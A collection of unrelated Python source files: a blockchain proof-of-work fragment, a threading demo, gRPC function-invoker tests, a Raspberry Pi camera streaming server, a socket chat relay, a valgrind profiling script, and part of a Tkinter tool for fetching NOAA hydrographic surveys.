str: Hex representation of ``block`` hash.
Raises:
ValueError: Will be raised if no ``Block`` object is passed.
"""
if not isinstance(block, Block):
raise ValueError("Only `Block` objects are hashable!")
logger.debug(f"Hashing block ... - block.index: {block.index}, block.proof: {block.proof}, block.previous_hash: {block.previous_hash}, block.timestamp: {block.timestamp}, block.data.id: {block.data.id}, block.data.message: {block.data.message}")
hash_value = hashlib.sha256(bytes(block)).hexdigest()
logger.debug(f"Hashing block done. - block hash: {hash_value}")
return hash_value
@staticmethod
def _is_proof_of_work_valid(last_proof: int, proof: int, difficulty: int) -> bool:
"""
Checks if the proof of work was correct.
The hash value of ``last_proof`` concatenated with ``proof`` has to be ``difficulty`` trailing 0s.
Args:
last_proof (int): Value of the ``proof`` of the preceding block.
proof (int): ``proof`` of the actual block.
difficulty (int): Amount of trailing 0s.
Returns:
bool: ``True`` if proof of work is correct, ``False`` otherwise.
Raises:
ValueError: Will be raised if ``difficulty`` is not a positive integer value.
"""
if difficulty <= 0:
raise ValueError("'difficulty' has to be a positive integer value.")
guess = "{}{}".format(last_proof, proof).encode()
guess_hash = hashlib.sha256(guess).hexdigest()
# hash ends with `difficulty` trailing 0?
return guess_hash[-difficulty:] == "0" * difficulty
@property
def blockchain(self) -> Blockchain:
return self._blockchain
@property
def difficulty(self) -> int:
return self._difficulty
@property
def unprocessed_data(self) -> set:
return self._unprocessed_messages
@unprocessed_data.setter
def unprocessed_data(self, unprocessed_messages: set) -> None:
self._unprocessed_messages = unprocessed_messages
@property
def neighbours(self) -> set:
return self._neighbours
@property
def port(self) -> int:
return self._port
@property
def jobs(self) -> list:
return self._jobs
@property
def server_process(self) -> Process:
return self._server_process
@property
def queue(self) -> Queue:
return self._queue
|
M2_Multithreading.py
|
from threading import Thread
def func1(length):
sum_f1 = 0
for x in range(0, length):
sum_f1 += x
print('Sum is {}'.format(sum_f1))
def func2(length):
""" Computes the sum of squares"""
sum_f2 = 0
for x in range(0, length):
sum_f2 += x * x
print('Sum of squares is {}'.format(sum_f2))
def func3(length):
""" Computes the sum of cubes"""
sum_f3 = 0
for x in range(0, length):
sum_f3 += x ** 3
print('Sum of cubes is {}'.format(sum_f3))
# Threading part
def do_threading():
length = 3
thread_simple = Thread(target=func1, args=(length,))
thread_square = Thread(target=func2, args=(length,))
thread_cube = Thread(target=func3, args=(length,))
# Start Execution
thread_simple.start()
thread_square.start()
thread_cube.start()
# Call the joint function
thread_simple.join()
thread_square.join()
thread_cube.join()
do_threading()
|
test_function_invoker.py
|
__copyright__ = '''
Copyright 2018 the original author or authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
__author__ = 'David Turanski'
from tests.utils import testutils
import sys
if sys.version_info[0] != 3:
raise RuntimeError("Requires Python 3")
import unittest
import os
import threading
import grpc
import uuid
sys.path.append('invoker')
sys.path.append('tests/functions')
import invoker.function_invoker
import invoker.function_pb2_grpc as function
import invoker.function_pb2 as message
class FunctionInvokerTest(unittest.TestCase):
"""
Forks function_invoker in a background thread. Easier for debugging
Assumes os.getcwd() is the project base directory
"""
def test_upper(self):
env = function_env('upper.py','handle')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('handle',func.__name__)
self.assertIsNone(interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function, args=([func,interaction_model,env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain']),
'correlationId': message.Message.HeaderValue(values=[str(uuid.uuid4())])
}
messages = [
message.Message(payload=bytes("hello", 'UTF-8'), headers=headers),
message.Message(payload=bytes("world", 'UTF-8'), headers=headers),
message.Message(payload=bytes("foo", 'UTF-8'), headers=headers),
message.Message(payload=bytes("bar", 'UTF-8'), headers=headers),
]
for msg in messages:
yield msg
responses = function.MessageFunctionStub(channel).Call(generate_messages())
expected = [b'HELLO', b'WORLD', b'FOO', b'BAR']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_bidirectional(self):
env = function_env('streamer.py','bidirectional')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('bidirectional', func.__name__)
self.assertEqual('stream',interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
stub = function.MessageFunctionStub(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain']),
}
messages = [
message.Message(payload=b'foo', headers=headers),
message.Message(payload=b'bar', headers=headers),
message.Message(payload=b'baz', headers=headers),
message.Message(payload=b'faz', headers=headers),
]
for msg in messages:
yield msg
responses = stub.Call(generate_messages())
expected = [b'FOO', b'BAR', b'BAZ', b'FAZ']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_filter(self):
env = function_env('streamer.py','filter')
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('filter', func.__name__)
self.assertEqual('stream',interaction_model)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def generate_messages():
headers = {
'Content-Type': message.Message.HeaderValue(values=['text/plain'])
}
messages = [
message.Message(payload=b'foo', headers=headers),
message.Message(payload=b'bar', headers=headers),
message.Message(payload=b'foobar', headers=headers),
]
for msg in messages:
yield msg
responses = function.MessageFunctionStub(channel).Call(generate_messages())
expected = [b'foo', b'foobar']
for response in responses:
self.assertTrue(response.payload in expected)
expected.remove(response.payload)
self.assertEqual(0, len(expected))
invoker.function_invoker.stop()
def test_discrete_window(self):
from itertools import count
import struct
import json
env = function_env('windows.py','discrete_window')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
unbounded generator of Messages converting int to bytes
'''
messages = (message.Message(payload=struct.pack(">I",i), headers = {'Content-Type': message.Message.HeaderValue(values=['application/octet-stream'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence of ints.
'''
for i in range(10):
tpl = json.loads(next(responses).payload)
self.assertEqual(3, len(tpl))
for j in range(len(tpl)):
self.assertEqual(i*3+j, tpl[j])
invoker.function_invoker.stop()
def test_discrete_window_text(self):
from itertools import count
import json
env = function_env('windows.py','discrete_window_text')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
unbounded generator of Messages converting int to bytes
'''
messages = (message.Message(payload=bytes("X%d" % i,'UTF-8') , headers = {'Content-Type': message.Message.HeaderValue(values=['text/plain'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence of ints.
'''
for _ in range(10):
tpl = json.loads(next(responses).payload)
invoker.function_invoker.stop()
def test_sliding_window(self):
from itertools import count
import struct
import json
env = function_env('windows.py','sliding_window')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
'''
unbounded generator of Messages converting int to bytes
'''
messages = (message.Message(payload=struct.pack(">I",i), headers = {'Content-Type': message.Message.HeaderValue(values=['application/octet-stream'])}) for i in count())
responses = function.MessageFunctionStub(channel).Call(messages)
'''
Check the first 10 responses. Each message is a json serialized tuple of size 3 containing the next sequence
of ints: ((0,1,2),(1,2,3),(2,3,4))
'''
for i in range(10):
tpl = json.loads(next(responses).payload)
self.assertEqual(3, len(tpl))
for j in range(len(tpl)):
self.assertEqual(i+j, tpl[j])
invoker.function_invoker.stop()
def test_source(self):
env = function_env('streamer.py','source')
func, interaction_model = invoker.function_invoker.install_function(env)
threading.Thread(target=invoker.function_invoker.invoke_function,
args=([func, interaction_model, env])).start()
channel = grpc.insecure_channel('localhost:%s' % env['GRPC_PORT'])
testutils.wait_until_channel_ready(channel)
def messages():
yield message.Message()
responses = function.MessageFunctionStub(channel).Call(messages())
for i in range(10):
self.assertEqual(bytes(str(i),'utf-8'), next(responses).payload)
invoker.function_invoker.stop()
def test_zip(self):
env = {
'FUNCTION_URI' : 'file://%s/tests/zip/myfunc.zip?handler=func.handler' % os.getcwd(),
'GRPC_PORT': testutils.find_free_port()
}
func, interaction_model = invoker.function_invoker.install_function(env)
self.assertEqual('HELLO',func('hello'))
os.remove('func.py')
os.remove('helpers.py')
self.assertEqual('handler',func.__name__)
def function_env(module,handler):
return {
'FUNCTION_URI': 'file://%s/tests/functions/%s?handler=%s' % (os.getcwd(),module,handler),
'GRPC_PORT': testutils.find_free_port()
}
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from urllib.parse import urlparse, parse_qs
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = True
HFLIP = True
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
o = urlparse(self.path)
path = o.path
query = parse_qs(o.query)
if path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif path == '/camera-settings':
content_type = 'text/html'
content = 'works'
self.server.camera.iso = int((query.get('iso')[0]))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self, camera):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
self.camera = camera
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
self.counter = 0
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.counter = self.counter + 1
self.websocket_server.manager.broadcast(buf, binary=True)
if self.counter > 30:
mill = int(round(time() * 1000))
self.counter = 0
self.websocket_server.manager.broadcast(str(mill), binary=False)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer(camera)
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
relay.py
|
import socket
from multiprocessing.dummy import Process, Pool
import settings
def listen(c):
while True:
try:
msg = c.recv(1024).decode('utf8')
except Exception as e:
print('[!] Error:', e)
clients.remove(c)
return
sendPool = Pool()
sendPool.map(lambda x: x.send(msg.encode('utf8')), clients)
def close():
print('[!] Server closed', clients)
for c in clients:
c.close()
def accept():
#accept all incomming connections
(client, client_address) = s.accept()
print(f'[+] {client_address[0]} connected to server')
clients.add(client)
list_Processes.append(Process(target=listen, args=(client,)))
list_Processes[-1].start()
if __name__ == "__main__":
clients = set()
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((settings.host, settings.port))
s.listen(100)
print(f'Server started s.on {settings.host}:{settings.port}')
#this is for storing all the listen Processs
list_Processes = []
while True:
accept()
# close server socket
#close()
s.close()
|
memory_tests.py
|
# Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shlex, subprocess, time, os, socket, sys, threading
if os.environ.get("PROFILING_BINS"):
binaries = os.environ.get("PROFILING_BINS").split(';')
valgrind = os.environ.get("VALGRIND_BIN")
certs_path = os.environ.get("CERTS_PATH")
test_time = "10"
if not valgrind:
valgrind = "valgrind"
def start_test(command, pubsub, time, transport):
os.system("mkdir -p output")
valgrind_command_rel = [valgrind, "--tool=massif", "--stacks=yes", "--detailed-freq=1", "--max-snapshots=1000", "--massif-out-file=./output/consumption_" + pubsub + "_" + transport + "_rel.out"]
valgrind_command_be = [valgrind, "--tool=massif", "--stacks=yes", "--detailed-freq=1", "--max-snapshots=1000", "--massif-out-file=./output/consumption_" + pubsub + "_" + transport + "_be.out"]
options = ["--time=" + time]
if certs_path:
options.extend(["--security=true", "--certs=" + certs_path])
# Best effort
print(valgrind_command_be +
[command, pubsub] +
options)
proc = subprocess.Popen(valgrind_command_be +
[command, pubsub] +
options)
proc.communicate()
py_command = "python3 ./memory_analysis.py ./output/consumption_" + pubsub + "_" + transport + "_be.out ./output/MemoryTest_" + pubsub + "_" + transport + "_be.csv"
p = subprocess.Popen(py_command, shell=True)
# Reliable
proc = subprocess.Popen(valgrind_command_rel +
[command, pubsub, "-r", "reliable"] +
options)
proc.communicate()
py_command = "python3 ./memory_analysis.py ./output/consumption_" + pubsub + "_" + transport + "_rel.out ./output/MemoryTest_" + pubsub + "_" + transport + "_rel.csv"
# print("Command: " + py_command)
p = subprocess.Popen(py_command, shell=True)
transport = ""
if len(sys.argv) >= 5:
transport = sys.argv[4]
if len(sys.argv) >= 4:
test_time = sys.argv[3]
if len(sys.argv) >= 3:
binaries = [sys.argv[2]]
for command in binaries:
if len(sys.argv) >= 2:
pubsub = sys.argv[1]
start_test(command, pubsub, test_time, transport)
else:
tpub = threading.Thread(target=start_test, args=(command, "publisher", test_time, transport))
tpub.start()
tsub = threading.Thread(target=start_test, args=(command, "subscriber", test_time, transport))
tsub.start()
quit()
|
nosgui.py
|
#!/usr/bin/env python
### nosgui.py
##
## Copyright (c) 2012, 2013, 2014, 2016, 2017, 2018 Matthew Love
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
## of the Software, and to permit persons to whom the Software is furnished to do so,
## subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
## INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
## PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
## FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
## ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##
### Code:
import sys
import os
from os.path import expanduser
import threading
import webbrowser
import Tkinter as tk
import tkFileDialog
import noslib
_nosgui_version = '0.1.4'
class Application(tk.Frame):
def __init__(self, master=None, *args, **kwargs):
tk.Frame.__init__(self, master)
self.grid(sticky=tk.N+tk.S+tk.E+tk.W)
self.s = None
self._ngdc_url="https://www.ngdc.noaa.gov/mgg/bathymetry/hydro.html"
self.sv = tk.StringVar()
self.sv.trace("w", lambda name, index, mode, var=self.sv: self._entryUpdate(self.sv))
self.dtGEODAS = tk.IntVar()
#self.dtXYZ = tk.IntVar()
self.dtBAG = tk.IntVar()
self.dtDR = tk.IntVar()
self.dtSmooth_Sheets = tk.IntVar()
self.dtTIDES = tk.IntVar()
self.dtproject_sketches = tk.IntVar()
self.dtBottom_Samples = tk.IntVar()
#self.dtHYD93 = tk.IntVar()
self.dtXML = tk.IntVar()
self.dtGeoImagePDF = tk.IntVar()
self.dtt = True
self.downloading = tk.StringVar(value="idle")
self.data_types = {'BAG':self.dtBAG, 'DR':self.dtDR, 'Smooth_Sheets':self.dtSmooth_Sheets, 'TIDES':self.dtTIDES, 'project_sketches': self.dtproject_sketches, 'Bottom_Samples':self.dtBottom_Samples, 'XML':self.dtXML, 'GEODAS':self.dtGEODAS, 'GeoImagePDF':self.dtGeoImagePDF}
self.nl = noslib.nosLib()
self.create_widgets()
self._listBoxUpdate()
self.resetDataType()
self.resetFetchDir()
def create_widgets(self):
top=self.winfo_toplevel()
top.rowconfigure(0, weight=1)
top.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
## Menu
self.menuBar = tk.Menu(top, relief=tk.FLAT)
top['menu'] = self.menuBar
self.fileMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.surveyMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.optionsMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.helpMenu = tk.Menu(self.menuBar, relief=tk.FLAT, tearoff=0)
self.menuBar.add_cascade(label="File", menu=self.fileMenu)
self.menuBar.add_cascade(label="Survey", menu=self.surveyMenu)
self.menuBar.add_cascade(label="Options", menu=self.optionsMenu)
self.menuBar.add_cascade(label="Help", menu=self.helpMenu)
self.fileMenu.add_command(label="Fetch Listed Surveys", command=self.fetchl)
self.fileMenu.add_separator()
self.fileMenu.add_command(label="Save Survey List", state=tk.DISABLED)
self.fileMenu.add_command(label="Generate Info Table", state=tk.DISABLED)
self.fileMenu.add_separator()
self.fileMenu.add_command(label="Quit", command=self.quit)
self.surveyMenu.add_command(label="Survey Report", command=self.si, state=tk.DISABLED)
self.surveyMenu.add_command(label="Survey Metadata", command=self.sm, state=tk.DISABLED)
self.surveyMenu.add_separator()
self.surveyMenu.add_command(label="Fetch Survey", command=self.fetchs, state=tk.DISABLED)
self.optionsMenu.add_command(label="Set Fetch Directory", command=self.setFetchDir)
self.optionsMenu.add_command(label="Set Datatypes", command=self.setDataType)
self.optionsMenu.add_command(label="Reset Datatypes", command=self.resetDataType)
self.optionsMenu.add_separator()
self.optionsMenu.add_command(label="Filter Surveys by Region", command=self.rfilter)
self.optionsMenu.add_command(label="Filter Surveys by Year", command=self.yrfilter)
self.optionsMenu.add_command(label="Reset Surveys", command=self.resetSurveys)
self.optionsMenu.add_separator()
self.optionsMenu.add_command(label="Update Survey DB", command=self.updateSurveys)
self.helpMenu.add_command(label='About', command=self.about_self)
self.helpMenu.add_command(label='About NOS Data', command=self.sa)
## Survey Frame
self.surveyFrame = tk.Frame(self, padx=5, pady=5)
self.yScroll = tk.Scrollbar(self.surveyFrame, orient=tk.VERTICAL)
self.surveyEntry = tk.Entry(self.surveyFrame,textvariable=self.sv)
self.surveyListBox = tk.Listbox(self.surveyFrame, yscrollcommand=self.yScroll.set, width=60)
self.surveyFrame.rowconfigure(1, weight=1)
self.surveyFrame.columnconfigure(0, weight=1)
self.surveyFrame.grid(column=0, columnspan=2,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyEntry.grid(column=0,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyListBox.grid(column=0, row=1, rowspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
self.surveyListBox.bind('<<ListboxSelect>>', self._listSelect)
self.yScroll.grid(column=1, row=0, rowspan=3,sticky=tk.N+tk.S+tk.E+tk.W)
self.yScroll['command'] = self.surveyListBox.yview
## status bar
self.statusBar = tk.Frame(self, padx=5, pady=5)
self.statusBar.grid(row=1, column=0, columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
self.statusBar.rowconfigure(0, weight=1)
self.statusBar.columnconfigure(1, weight=1)
self.infoLabel = tk.Label(self.statusBar, textvariable=self.downloading)
self.infoLabel.grid(column=0, row=0, sticky=tk.N+tk.S+tk.E+tk.W)
self.listLabel = tk.Label(self.statusBar, text=str(len(self.nl.surveys)))
self.listLabel.grid(column=1, row=0, sticky=tk.E)
#self.listLabel.bind('<Button-1>', self.stopFetch)
def _reload_noslib(self):
reload(noslib)
self.nl = noslib.nosLib()
def _entryUpdate(self, sv):
tmp_sv = sv.get()
nslist=[]
self.nl._reset()
for i in self.nl.surveys:
if tmp_sv.upper() in i[0]:
nslist.append(i)
self.nl.surveys = nslist
self._listBoxUpdate()
def _listBoxUpdate(self):
self.surveyListBox.delete(0,self.surveyListBox.size())
for h,i in enumerate(self.nl.surveys):
self.surveyListBox.insert(tk.END, "%s (%s) %s" %(i[0], i[2], i[1]))
if h&1:
self.surveyListBox.itemconfig(h, background='gray90')
self.listLabel.config(text=str(len(self.nl.surveys)))
def _listSelect(self, evt):
# Note here that Tkinter passes an event object to onselect()
#w = evt.widget
if self.surveyListBox.curselection():
self.surveyMenu.entryconfigure(0,state=tk.NORMAL)
self.surveyMenu.entryconfigure(1,state=tk.NORMAL)
self.surveyMenu.entryconfigure(3,state=tk.NORMAL)
print("Survey: %s" %(self.nl.surveys[int(self.surveyListBox.curselection()[0])][0]))
def _onListSelect(self):
# Note here that Tkinter passes an event object to onselect()
#w = evt.widget
if self.surveyListBox.curselection():
index = int(self.surveyListBox.curselection()[0])
value = self.nl.surveys[index]
self.s = noslib.nosSurvey(value[0])
return True
else: return False
def yrfilter(self):
self.yw = tk.Toplevel(class_="nosfetch")
self.yw.title("Filter by Year")
self.by = tk.IntVar(value=0)
self.ey = tk.IntVar(value=3000)
self.yearFrame = tk.LabelFrame(self.yw, text="Year", padx=5, pady=5)
tk.Entry(self.yearFrame, width=10, textvariable=self.by).grid(column=0,row=0, sticky=tk.W)
tk.Entry(self.yearFrame, width=10, textvariable=self.ey).grid(column=1,row=0, sticky=tk.E)
tk.Button(self.yearFrame, text="Filter", command=self.yrfilterSurveys).grid(column=0,row=3, columnspan=2,sticky=tk.N+tk.S+tk.E+tk.W)
self.yearFrame.grid(column=0,row=0,columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
def rfilter(self):
self.rw = tk.Toplevel(class_="nosfetch")
self.rw.title("Filter by Region")
self.bee = tk.StringVar(value="-90")
self.bew = tk.StringVar(value="-89")
self.ben = tk.StringVar(value="40")
self.bes = tk.StringVar(value="30")
## Region Frame
self.boundsFrame = tk.LabelFrame(self.rw, text="Region", padx=5, pady=5)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bee).grid(column=0,row=1, sticky=tk.W)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bew).grid(column=1,row=1, sticky=tk.E)
tk.Entry(self.boundsFrame, width=10, textvariable=self.ben).grid(column=0,row=0,columnspan=2, sticky=tk.N)
tk.Entry(self.boundsFrame, width=10, textvariable=self.bes).grid(column=0,row=2,columnspan=2, sticky=tk.S)
tk.Button(self.boundsFrame, text="Filter", command=self.filterSurveys).grid(column=0,row=3, columnspan=2,sticky=tk.N+tk.S+tk.E+tk.W)
self.boundsFrame.grid(column=0,row=0,columnspan=2, sticky=tk.N+tk.S+tk.E+tk.W)
def fetchSurveys(self, fsurveys):
def callback():
self.downloading.set("fetching")
for h,i in enumerate(fsurveys):
s = noslib.nosSurvey(i[0])
for dt in self.nl._dtypes:
#if dt in s._dtypes:
s.fetch(dt)
self.downloading.set("idle")
t = threading.Thread(target=callback)
t.start()
def fetchs(self):
if self.surveyListBox.curselection():
index = int(self.surveyListBox.curselection()[0])
fsurveys = [self.nl.surveys[index]]
self.fetchSurveys(fsurveys)
def fetchl(self):
print("Fetching %d Surveys" %(len(self.nl.surveys)))
self.fetchSurveys(self.nl.surveys)
def about_self(self):
self.about = tk.Toplevel(class_="about")
self.about.title("About nosgui")
## About Frame
self.aboutFrame = tk.LabelFrame(self.about, text="About", padx=5, pady=5)
self.aboutText = tk.Text(self.aboutFrame)
self.aboutText.grid(row=0,column=0)
self.aboutText.insert(tk.INSERT, " \n\
[ nosGUI ] \n\
------------ \n\
\n\
Fetch and query NOS hydrographic data.\n\
\n\
------------\n\
\n\
\n\
Send questions or comments, etc to <matthew.love@colorado.edu>\n\
")
self.aboutFrame.grid(column=0,row=0, sticky=tk.N+tk.S+tk.E+tk.W)
def sa(self):
print(self._ngdc_url)
webbrowser.open(self._ngdc_url)
def si(self):
is_sel = self._onListSelect()
print(self.s._data_url)
print(self.s._valid)
if is_sel:
if self.s:
webbrowser.open(self.s._data_url)
def sm(self):
is_sel = self._onListSelect()
print(self._ngdc_url)
if is_sel:
if self.s:
webbrowser.open(self.s._xml_url)
def resetSurveys(self):
self.nl._reset()
self.sv.set("")
self._listBoxUpdate()
def filterSurveys(self):
self.rw.destroy()
extent = [float(self.bee.get()),float(self.bew.get()),float(self.bes.get()),float(self.ben.get())]
self.nl.bfilter(extent)
self._listBoxUpdate()
def yrfilterSurveys(self):
self.yw.destroy()
self.nl.yrfilter(self.by.get(), self.ey.get())
self._listBoxUpdate()
def resetDataType(self):
self.nl._reset_dtypes()
for i in self.nl._dtypes:
self.data_types[i].set(1)
print("Datatypes: %s" %(self.nl._dtypes))
def toggleDataTypes(self, evt):
for i in self.data_types:
if self.dtt: dti = 0
else: dti = 1
self.data_types[i].set(dti)
self.dtt = not self.dtt
def setDataType(self):
self.w = tk.Toplevel(class_="test")
self.w.title("Datatype")
self.typeCheckFrame = tk.LabelFrame(self.w, text="Data Type")
self.typeCheckFrame.bind('<Button-1>', self.toggleDataTypes)
self.typeCheckFrame.grid(row=0, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
for h,i in enumerate(self.data_types):
if h <= 4:
tk.Checkbutton(self.typeCheckFrame, text=i, indicatoron=1, variable=self.data_types[i]).grid(column=0,row=h,sticky=tk.W)
else: tk.Checkbutton(self.typeCheckFrame, text=i, indicatoron=1, variable=self.data_types[i]).grid(column=1,row=h-5,sticky=tk.W)
tk.Checkbutton(self.typeCheckFrame, text="XYZ", indicatoron=1, variable=self.data_types["GEODAS"]).grid(column=1,row=len(self.data_types)-5,sticky=tk.W)
self.typeCheckOK = tk.Button(self.w, text="OK", command=self._typeCheckChange)
